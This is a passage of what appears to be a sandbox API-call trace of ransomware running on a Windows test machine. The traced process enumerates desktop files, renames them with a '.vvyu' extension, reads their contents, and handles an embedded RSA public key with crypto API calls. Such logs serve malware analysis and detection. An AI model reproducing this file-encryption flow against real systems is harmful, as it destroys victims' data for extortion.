lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0183.929] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0183.930] WriteFile (in: hFile=0x584, lpBuffer=0x2d41d38*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d41d38*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0183.930] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41d38 | out: hHeap=0x6a0000) returned 1 [0183.930] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0183.930] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0183.930] CloseHandle (hObject=0x584) returned 1 [0183.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0183.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x870) returned 0x2d41908 [0183.932] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0183.932] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\j3eSmPNiBweFL.wav" (normalized: "c:\\users\\keecfmwgj\\desktop\\j3esmpnibwefl.wav"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\j3eSmPNiBweFL.wav.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\j3esmpnibwefl.wav.vvyu")) returned 1 [0183.939] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0183.939] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0183.939] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0183.942] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6ff30 | out: hHeap=0x6a0000) returned 1 [0183.942] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8bd62e30, ftCreationTime.dwHighDateTime=0x1d8a11e, ftLastAccessTime.dwLowDateTime=0x56cb4ce0, ftLastAccessTime.dwHighDateTime=0x1d8a27f, ftLastWriteTime.dwLowDateTime=0x56cb4ce0, ftLastWriteTime.dwHighDateTime=0x1d8a27f, nFileSizeHigh=0x0, nFileSizeLow=0x14fd7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nXSjMsaaHggbTx9Qy.rtf", cAlternateFileName="NXSJMS~1.RTF")) returned 1 [0183.942] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d310a8 [0183.942] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0183.943] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d310a8 | out: hHeap=0x6a0000) returned 1 [0183.943] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\nXSjMsaaHggbTx9Qy.rtf") returned=".rtf" [0183.943] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\nXSjMsaaHggbTx9Qy.rtf" (normalized: "c:\\users\\keecfmwgj\\desktop\\nxsjmsaahggbtx9qy.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0183.943] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=85975) returned 1 [0183.943] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0183.949] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x14fb1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0183.949] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0183.951] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0183.951] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0183.951] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0183.951] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x14fd7, lpOverlapped=0x0) returned 1 [0183.952] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0183.952] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0183.952] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0183.952] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0183.952] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0183.954] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0183.954] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0183.954] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0183.954] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0183.954] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0183.954] GetLastError () returned 0x0 [0183.954] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0183.954] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0183.954] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0183.954] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0183.954] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0183.954] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0183.954] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0183.954] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0183.954] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0183.955] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14fe0) returned 0x2d43778 [0183.955] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0183.955] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0183.955] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0183.956] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0183.956] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0183.956] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0183.956] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d310a8 [0183.956] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e7f8 [0183.956] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d310f0 [0183.956] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e810 [0183.956] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e840 [0183.956] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e8a0 [0183.956] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e858 [0183.956] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0183.956] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2d31688 [0183.956] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2d31688, Size=0x218) returned 0x2d3b920 [0183.956] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d41908 [0183.956] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e840 | out: hHeap=0x6a0000) returned 1 [0183.956] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e858 | out: hHeap=0x6a0000) returned 1 [0183.956] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e8a0 | out: hHeap=0x6a0000) returned 1 [0183.957] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0183.957] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0183.957] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e8a0 [0183.957] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0183.957] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e858 [0183.957] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0183.957] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2c4e840 [0183.957] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0183.957] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0183.957] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0183.957] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c98 [0183.957] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0183.957] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0183.957] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0183.957] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0183.958] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0183.958] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e858 | out: hHeap=0x6a0000) returned 1 [0183.958] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0183.958] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e840 | out: hHeap=0x6a0000) returned 1 [0183.958] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0183.958] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0183.958] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e8a0 | out: hHeap=0x6a0000) returned 1 [0183.958] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0183.959] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0183.959] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0183.959] GetCurrentThreadId () returned 0x264 [0183.959] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0183.959] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x6ce920 [0183.959] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0183.959] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0183.959] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2c84da8 [0183.959] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0183.959] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0183.959] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0183.959] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.960] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.960] GetCurrentThreadId () returned 0x264 [0183.960] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.961] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.961] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0183.961] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.961] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.961] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.961] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.962] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0183.962] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0183.962] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0183.962] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c828a8 [0183.962] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0183.962] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0183.962] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0183.962] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e8a0 [0183.962] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0183.962] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0183.962] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0183.962] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0183.962] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0183.962] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0183.962] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0183.962] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0183.962] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e840 [0183.962] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0183.962] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0183.962] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0183.962] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0183.962] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0183.962] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0183.962] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0183.963] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e858 [0183.963] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0183.963] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0183.963] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0183.963] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e828 [0183.963] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0183.963] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e8b8 [0183.963] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0183.963] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0183.963] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0183.963] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e888 [0183.963] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0183.963] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e870 [0183.963] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0183.963] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e8d0 [0183.963] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e870 | out: hHeap=0x6a0000) returned 1 [0183.963] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e870 [0183.963] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e888 | out: hHeap=0x6a0000) returned 1 [0183.963] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0183.963] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0183.963] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0183.963] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0183.963] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0183.964] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e840 | out: hHeap=0x6a0000) returned 1 [0183.964] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e840 [0183.964] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0183.964] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d2fc98 [0183.964] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e8a0 | out: hHeap=0x6a0000) returned 1 [0183.964] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0183.964] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e8d0 | out: hHeap=0x6a0000) returned 1 [0183.964] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d41908 [0183.964] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0183.964] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0183.964] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0183.964] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0183.964] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e840 | out: hHeap=0x6a0000) returned 1 [0183.964] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d41b20 [0183.964] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0183.965] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0183.965] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0183.965] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0183.965] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0183.966] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0183.966] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0183.966] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0183.966] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0183.967] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41b20 | out: hHeap=0x6a0000) returned 1 [0183.967] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0183.967] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0183.967] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e870 | out: hHeap=0x6a0000) returned 1 [0183.967] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0183.967] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e8b8 | out: hHeap=0x6a0000) returned 1 [0183.967] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0183.967] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e858 | out: hHeap=0x6a0000) returned 1 [0183.967] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e828 | out: hHeap=0x6a0000) returned 1 [0183.967] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84da8 | out: hHeap=0x6a0000) returned 1 [0183.968] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0183.968] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0183.968] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e810 | out: hHeap=0x6a0000) returned 1 [0183.968] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d310f0 | out: hHeap=0x6a0000) returned 1 [0183.968] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc98 | out: hHeap=0x6a0000) returned 1 [0183.969] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0183.969] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0183.969] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0183.969] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0183.969] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0183.970] HeapFree (in: 